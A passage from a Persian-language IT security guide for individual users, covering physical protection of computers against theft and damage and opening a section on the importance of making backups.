‫ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺳﺎﺭﻕ ﻣﺎﻳﻞ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺷﺨﺼﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪ‬
‫ﻧﺒﺎﺷﺪ ﻣﺮﺍﻛﺰ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺩﺯﺩﻱ ﻭ‬
‫ﺩﺳﺖﺩﻭﻡ ﺭﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺳـﺎﺭﻗﺎﻥ‪ ،‬ﺭﺍﻳﺎﻧـﻪ ﻭ‬
‫ﻧﻤﺎﻳﺸﮕﺮ ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑﻪ ﺳﺮﻗﺖ ﻧﻤﻲﺑﺮﻧﺪ ﺑﻠﻜـﻪ ﻗـﺴﻤﺘﻬﺎﻱ‬
‫ﻣﻬﻢ ﺁﻥ ﻣﺎﻧﻨﺪ ﺣﺎﻓﻈﻪ ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮ ﺭﺍ ﻣﻲﺩﺯﺩﻧﺪ‪ .‬ﺑﺎﻳﺪ ﮔﻔـﺖ ﻛـﻪ‬
‫ﻫﺮ ﺩﻭ ﻣﻮﺭﺩ ﺑﺎﺯﺍﺭ ﺧﻮﺑﻲ ﺩﺍﺭﻧـﺪ ﻭ ﺣﻤـﻞ ﻭ ﻧﻘﻠـﺸﺎﻥ ﻧﻴـﺰ ﺁﺳـﺎﻥ‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﭘﻴﺪﺍ ﻛﺮﺩﻧﺸﺎﻥ ﺍﮔﺮ ﭼﻪ ﻏﻴﺮﻣﻤﻜﻦ ﻧﻴﺴﺖ ﻭﻟـﻲ ﺑـﺴﻴﺎﺭ‬
‫ﺩﺷﻮﺍﺭ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪٥٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺷﺪﻩ ﻭ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒـﺮﺩ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺁﮊﻳـﺮ ﺧﻄـﺮ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﺍﻳﻤﻨﻲ‪ ،‬ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺑﻞ ﺳﻴﻤﻲ ﻭ‬
‫ﻳﺎ ﺯﻧﺠﻴﺮ ﺑﻪ ﻣﻴﻠﻪ‪ ،‬ﻟﻮﻟﻪ ﻳﺎ ﺍﺷﻴﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ‬
‫ﻧﺪﺍﺭﻧﺪ ﻣﺘـﺼﻞ ﻛﻨﻴـﺪ‪ .‬ﺍﺯ ﺍﻳـﻦ ﺭﻭﺵ ﺩﺭ ﻣﺤﺎﻓـﻞ ﻧـﺴﺒﺘﹰﺎ‬
‫ﻋﻤﻮﻣﻲ ﻣﺜﻞ ﻣﺪﺍﺭﺱ ﻭ ﻳﺎ ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ‪.‬‬
‫ﺍﻛﺜﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺍﺭﺍﻱ ﻣﺤﻠﻲ ﻣﺨﺼﻮﺹ ﺍﺗﺼﺎﻝ ﻣﻲﺑﺎﺷـﻨﺪ‪.‬‬
‫ﻻ ﺩﺍﺭﺍﻱ ﻛﺎﺑﻠﻬﺎ ﻭ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻌﻤﻮ ﹰ‬
‫ﻗﻔﻠﻬﺎﻱ ﺑﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ‪.‬‬
‫•‬
‫ﭼﻨﺎﻧﭽﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﺍﻱ ﻗﻔﻠﻲ ﻣـﻲﺑﺎﺷـﺪ ﻛـﻪ ﺍﺯ ﺑـﺎﺯ ﺷـﺪﻥ‬
‫ﺑﺪﻧﻪ‪ ١٤‬ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲ ﻛﻨﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﻲﺗﻮﺍﻥ‬
‫ﺍﺯ ﭘﻴﭽﻬﺎﻱ ﻣﺨـﺼﻮﺹ ﻛـﻪ ﺑﺮﺍﺣﺘـﻲ ﻗﺎﺑـﻞ ﺑـﺎﺯ ﻛـﺮﺩﻥ‬
‫ﻧﻴﺴﺘﻨﺪ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫•‬
‫ﭼﻨﺎﻧﭽﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺭﺯﺷـﻤﻨﺪﻱ )ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻛـﺎﺭﻱ ﻳـﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ( ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻻﺯﻡ ﺍﺳـﺖ‬
‫ﺯﻣﺎﻧﻲ ﻛﻪ ﺁﻧﺮﺍ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒـﺖ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻭ ﻳـﺎ ﺍﺯ ﺁﻥ ﺩﻭﺭ‬
‫ﻫﺴﺘﻴﺪ )ﻣﺜ ﹰﻼ ﺍﮔﺮ ﺍﺯ ﻫﺘﻞ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻳﺪ ﻭ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﺗﺎﻕ ﺍﺳـﺖ(‬
‫ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ‪ ١٥‬ﺑﻪ ﺁﻧﺮﺍ ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﻛـﺎﻫﺶ‬
‫ﺩﻫﻴﺪ‪ .‬ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ﺑـﻪ ﻣﻌﻨـﺎﻱ ﺍﺳـﺘﻔﺎﺩﺓ ﻭﺍﻗﻌـﻲ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜـﻲ ﺑـﻪ‬
‫ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻣـﺴﺘﺤﻜﻢ ﻭ‬
‫ﻣﺤﺎﻓﻈﻬﺎﻱ ﺻﻔﺤﻪﻧﻤـﺎﻳﺶ ﻣﺠﻬـﺰ ﺑـﻪ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ‬
‫ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷـﺮﻭﻉ ﺍﻳـﻦ ﻧـﻮﻉ ﺍﺯ ﺣﻔﺎﻇـﺖ‬
‫ﻫﺴﺘﻨﺪ )ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺑﺤﺚ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺠﻮﺯ ﻭﺭﻭﺩ ﺩﺭ‬
‫ﻫﻤﻴﻦ ﻓﺼﻞ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(‪.‬‬
‫•‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻭ ‪PDA‬ﻫﺎ‪ ١٦‬ﻛﻮﭼﻚ ﻣﻲﺑﺎﺷـﻨﺪ ﻭ ﺑـﻪ‬
‫ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺯﺩﻳﺪﻥ ﺁﻧﻬﺎ ﺁﺳﺎﻥ ﺍﺳـﺖ‪ .‬ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻧﻤﻲﻛﻨﻴـﺪ ﺣﺘﻤـﹰﺎ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺯ ﻣﺤـﻴﻂ ﻛـﺎﺭ‬
‫ﺧﺎﺭﺝ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﺎﻳﻞ ﺑﻪ ﺧﺮﻳﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﺳـﺖ ﺩﻭﻡ ﺑﺎﺷـﻨﺪ ﺑـﺴﻴﺎﺭ‬
‫ﺍﻧﺪﻙ ﻫﺴﺘﻨﺪ‪ ،‬ﺧﺼﻮﺻﹰﺎ ﺍﮔﺮ ﻣـﺸﺨﺺ ﺑﺎﺷـﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺯﺩﻱ‬
‫ﺍﺳﺖ‪ .‬ﺑﻬﺘﺮﻳﻦ ﻭ ﺍﺭﺯﺍﻧﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺳﺎﺭﻗﺎﻥ ﺗﻤﺎﻳﻠﻲ ﺑﻪ‬
‫ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺸﺨـﺼﺎﺕ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﺎ ﻋﻼﺋﻢ ﺛﺎﺑﺖ ﻭ ﻣﺎﻧﺪﮔﺎﺭ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩ ﺑﺮ ﺑﺪﻧﺔ‬
‫ﺭﺍﻳﺎﻧﻪ ﺣﻚ ﻭ ﻳﺎ ﻧﻘﺎﺷﻲ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺗﻮﺍﻧـﺪ ﺷـﺎﻣﻞ‬
‫ﺍﺳﻢ ﻳﺎ ﻣﺸﺨﺼﺎﺕ ﺩﻳﮕﺮ ﺑﺎﺷﺪ‪ .‬ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺍﺯ ﺍﻳـﻦ‬
‫ﻧﻮﻉ ﻋﻼﻣﺘﻬﺎ ﺩﺭ ﻗـﺴﻤﺖ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻳـﺎ ﺷـﻜﺎﻓﻬﺎﻱ ﺩﻳﮕـﺮ‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﻧﻨﻤﺎﻳﻴــﺪ‪ .‬ﻫﻤﭽﻨــﻴﻦ ﺁﮔــﺎﻩ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ‬
‫ﻋﻼﻣﺘﮕﺬﺍﺭﻱ ﺭﻭﻱ ﺑﺪﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﺑﻄﺎﻝ ﺿﻤﺎﻧﺘﻨﺎﻣﻪ ﮔﺮﺩﺩ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻧﺪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﺴﺒﺖ ﺑـﻪ ﮔـﺮﺩ ﻭ ﺧـﺎﻙ ﻭ ﺳـﻄﻮﺡ ﻧـﺎﻫﻤﻮﺍﺭ ﺣـﺴﺎﺱ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻣﺤﻠﻲ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ﻛـﻪ‬
‫ﮔﺮﺩ ﻭ ﺧﺎﻙ ﺩﺭ ﺁﻧﺠﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﺮﺗﺒﹰﺎ ﺑﺎﻳﺪ ﺑـﺎ ﺩﻗـﺖ ﺯﻳـﺎﺩ ﺁﻧـﺮﺍ‬
‫ﺗﻤﻴﺰ ﻛﺮﺩ ﺗﺎ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻣـﺴﺪﻭﺩ ﻧـﺸﻮﺩ‪ .‬ﺑﺮﺧـﻲ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‬
‫ﻫﻤﭽﻨﻴﻦ ﻧﺴﺒﺖ ﺑﻪ ﻓﺮﻭﺭﻓﺘﮕﻴﻬـﺎ ﻭ ﺑﺮﺁﻣـﺪﮔﻴﻬﺎﻱ ﺳـﻄﺤﻲ ﻛـﻪ‬
‫ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﻴﺰ ﺣﺴﺎﺱ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﺟﻨﺒﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬
‫ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﻧﺼﺐ ﻳﻚ ﻗﻄﻌﻪ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺑﺪﻧـﺔ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺎﺯ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﺑﻪ ﺍﺧﻄﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭﺑـﺎﺭﺓ ﺷـﻮﻛﻬﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺩﺍﺩﻩ ﺷﺪﻩ ﺗﻮﺟﻪ ﻛﻨﻴﺪ )ﺷﻮﻙ ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺑﺎﻋـﺚ‬
‫ﺻﺪﻣﻪﺩﻳﺪﻥ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻲﺷﻮﺩ ﻭ ﺑﺎﻳﺪ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ(‪ .‬ﺿﻤﻨﹰﺎ‬
‫ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﺮﻕﮔﺮﻓﺘﮕﻲ ﻻﺯﻡ ﺍﺳﺖ ﺑـﺪﻥ‬
‫ﺷﻤﺎ ﺑﺎ ﺯﻣﻴﻦ ﺩﺭ ﺗﻤﺎﺱ ﺩﺍﺋﻢ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ‪ ١٧‬ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ‬
‫ﺩﺭ ﻗﺴﻤﺖ ﻗﺒﻞ ﻣﻄﺎﻟﺒﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﻣـﺪ‪ .‬ﺩﺭ‬
‫ﺍﻳﻦ ﻗﺴﻤﺖ ﻣﻮﺍﺭﺩﻱ ﺷﺮﺡ ﺩﺍﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺷـﺪ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﺮﺩ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﺣﻔﺎﻇﺖ‬
‫ﻛﺎﻣﻞ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺷﻤﺎ ﭼﮕﻮﻧﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ؟‬
‫ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ‬
‫ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫•‬
‫•‬
‫‪Case‬‬
‫‪Logical Access‬‬
‫‪Personal Digital Assistants‬‬
‫‪14‬‬
‫‪15‬‬
‫‪16‬‬
‫ﭘﺎﻙ ﺷﺪﻥ ﺍﺗﻔﺎﻗﻲ ﻓﺎﻳﻞ؛‬
‫ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪ؛‬
‫‪Backups‬‬
‫‪17‬‬
‫‪٥٧‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﻳﻜﻲ ﺍﺯ ﺭﺍﻩﺣﻠﻬﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ‪ ،‬ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫـﺎﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﻳﻚ ﻛﭙـﻲ ﺍﺯ‬
‫ﻓﺎﻳﻞ ﻳﺎ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﻧﺘﻘﺎﻝ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ‬
‫ﻓﻼﭘﻲ ﻭ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺍﺯ ﺁﻥ ﻧﮕﻬﺪﺍﺭﻱ ﻣـﻲﺷـﻮﺩ‪ .‬ﭼﻨﺎﻧﭽـﻪ‬
‫ﻓﺎﻳﻞ ﺍﺻﻠﻲ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﺩ ﻳﺎ ﭘﺎﻙ ﺷﻮﺩ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ‬
‫ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻭ ﺁﻧﺮﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻓﺎﻳﻞ ﻗﺒﻠﻲ ﻧﻤﻮﺩ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺩﻭﻡ‪:‬‬
‫ﻣﺮﺗﺒ ﹰﺎ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ﻭ ﺍﮔﺮ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ ﻣﻌـﺮﺽ‬
‫ﺗﻬﺪﻳﺪ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻧﻜﺎﺕ ﺣﻔﺎﻇﺘﻲ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ‪.‬‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﻭ ﻳﺎ ﺑـﺴﻴﺎﺭ ﭘﻴﭽﻴـﺪﻩ‬
‫ﺑﺎﺷﻨﺪ )ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ ﻓﻼﭘـﻲ ﻛـﻪ ﺍﺯ‬
‫ﺁﻥ ﺩﺭ ﻛﺸﻮﻱ ﻣﻴـﺰ ﻛـﺎﺭ ﺧـﻮﺩ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ(‪ .‬ﺍﻛﺜـﺮ‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻓﺎﻳﻠﻲ‬
‫ﺭﺍ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺩﺍﺭﻳﺪ ﺑﻪ ﺭﻭﻱ ﻧﻮﺍﺭﻫـﺎﻱ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﻭ ﻳـﺎ‬
‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ‪ ١٩‬ﻛﭙﻲ ﻛﻨﻴﺪ‪ .‬ﭼﻨﺎﻧﭽـﻪ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺷﻤﺎ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ‪ ،‬ﺑﺎ ﺧﺮﻳﺪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺟﺪﻳﺪ ﺑﺎ ﺳﺎﺧﺘﺎﺭﻱ ﻣـﺸﺎﺑﻪ‬
‫ﺭﺍﻳﺎﻧﺔ ﻗﺪﻳﻤﻲ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴـﺪ‬
‫ﺑﻮﺩ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻪ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ‪.‬‬
‫ﻧﻘﺎﻳﺺ‪ ،‬ﺗﺼﺎﺩﻓﺎﺕ‪ ،‬ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ﻭ ﺣﻤﻼﺕ ﻣﻬـﺎﺟﻤﻴﻦ ﻗﺎﺑـﻞ‬
‫ﻻ ﻋﻠﻴـﺮﻏﻢ ﺗﻼﺷـﻬﺎﻱ ﺯﻳـﺎﺩ ﺑـﺮﺍﻱ‬
‫ﭘﻴﺶ ﺑﻴﻨـﻲ ﻧﻴـﺴﺘﻨﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺑﻌﻀﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺟﻠﻮﮔﻴﺮﻱ‬
‫ﻧﻤﻮﺩ‪ ،‬ﻭﻟﻲ ﺍﮔﺮ ﭘـﺸﺘﻴﺒﺎﻥ ﻣﻨﺎﺳـﺐ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩ ﺑﺎﺷـﻴﺪ ﺣـﺪﺍﻗﻞ‬
‫‪Hard Disk‬‬
‫‪CD-ROMs‬‬
‫‪18‬‬
‫‪19‬‬
‫ﺩﻻﻳﻞ ﮔﻮﻧﺎﮔﻮﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷـﻮﻧﺪ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺍﺟﺰﺍﻱ ﻛﻠﻴﺪﻱ ﻭ ﻣﻬﻤﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻣﺤـﺴﻮﺏ‬
‫ﺷﻮﻧﺪ‪:‬‬
‫ﺧﻄﺎﻱ ﻛﺎﺭﺑﺮ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺮﺧﻲ ﻣﻮﺍﻗﻊ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ‬
‫ﭘﺎﻙ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺍﺳـﻄﻬﺎﻱ ﮔﺮﺍﻓﻴﻜـﻲ ﻛـﺎﺭﺑﺮ ﺍﻳـﻦ‬
‫ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻓﺎﻳﻞ ﻳﺎ ﺷـﺎﺧﻪ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﺑـﻪ‬
‫ﻣﻜﺎﻧﻲ ﻧﺎﺩﺭﺳﺖ ﻣﻨﺘﻘﻞ ﺷﻮﺩ‪ .‬ﺍﻣﺎ ﭼﻨﺎﻧﭽﻪ ﻣﺮﺗﺒﹰﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﭘﺸﺘﻴﺒﺎﻥ‬
‫ﺗﻬﻴﻪ ﺷﺪﻩ ﺑﺎﺷﺪ ﺍﻣﻜﺎﻥ ﺑﺎﺯﻳﺎﺑﻲ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻄﻮﺭ ﺍﺗﻔﺎﻗﻲ ﭘـﺎﻙ‬
‫ﺷﺪﻩﺍﻧﺪ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺷﺘﺒﺎﻫﺎﺕ‬
‫ﻛﻮﭼﻚ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻫﻜﺎﺭ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ ﺧﻮﺑﻲ ﺑﺎﺷﺪ‪.‬‬
